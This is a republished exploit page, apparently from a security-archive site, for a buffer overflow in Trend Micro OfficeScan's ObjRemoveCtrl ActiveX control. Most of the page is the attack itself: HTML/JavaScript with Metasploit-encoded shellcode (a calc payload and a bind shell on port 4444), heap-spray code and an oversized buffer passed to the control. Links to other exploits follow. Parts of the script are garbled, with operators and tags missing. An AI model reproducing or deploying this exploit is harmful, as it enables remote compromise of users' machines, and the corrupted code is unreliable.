Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

摘要：TrendMicroOfficeScanObjRemoveCtrlActiveXControlBufferOverflowExploitfu...

<!--

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Exploit

written by e.b.

Tested on Windows XP SP2(fully patched) English, IE6 IE7, OfficeScan 7.3 patch 4, OfficeScanRemoveCtrl.dll version 7.3.0.1020

The control is installed when you install OfficeScan through the server web console.

This was fixed in OfficeScan 8.x(uses strcpy_s which throws INVALID_PARAMETER, still crashes the browser though)

Thanks to h.d.m. and the Metasploit crew

-->

<html>

<head>

<title>Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control Buffer Overflow Exploit</title>

function Check() {

// win32_exec - EXITFUNC=seh CMD=c:windowssystem32calc.exe Size=378 Encoder=Alpha2 http://metasploit.com

var shellcode1 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"

"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a"

"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241"

"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c"

"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c"

"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f"

"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b"

"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c"

"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831"

"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955"

"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b"

"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b"

"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44"

"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35"

"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530"

"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b"

"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c"

"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63"

"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f"

"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377"

"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f"

"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035"

"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653"

"%u314e%u7475%u7038%u7765%u4370"); // win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com

var shellcode2 = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949"

"%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a"

"%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241"

"%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c"

"%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f"

"%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c"

"%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f"

"%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b"

"%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c"

"%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31"

"%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35"

"%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b"

"%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663"

"%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733"

"%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470"

"%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358"

"%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f"

"%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458"

"%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58"

"%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f"

"%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275"

"%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45"

"%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033"

"%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046"

"%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035"

"%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036"

"%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64"

"%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35"

"%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67"

"%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30"

"%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f"

"%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246"

"%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139"

"%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652"

"%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e"

"%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b"

"%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075"

"%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251"

"%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f"

"%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f"

"%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b"

"%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952"

"%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73"

"%u684f%u3956%u386f%u4350");

var bigblock = unescape("%u0A0A%u0A0A");

var headersize = 20;

var slackspace = headersize shellcode1.length;

while (bigblock.length < slackspace) bigblock = bigblock;

var fillblock = bigblock.substring(0,slackspace);

var block = bigblock.substring(0,bigblock.length - slackspace);

while (block.length slackspace < 0x40000) block = block block fillblock; var memory = new Array();

for (i = 0; i < 330; i ){ memory[i] = block shellcode1 } var buf = '';

while (buf.length < 1008) buf = buf unescape(" "); obj.Server = buf;

}

</script>

</head>

Unable to create object

</object> </body>

</html>

【Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit】相关文章：

★ Anzio Web Print Object

★ HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit

★ fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

★ PPMate PPMedia Class ActiveX Control Buffer Overflow PoC

★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

★ AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

★ FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

★ Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

上一篇： HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

下一篇： Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

学习工具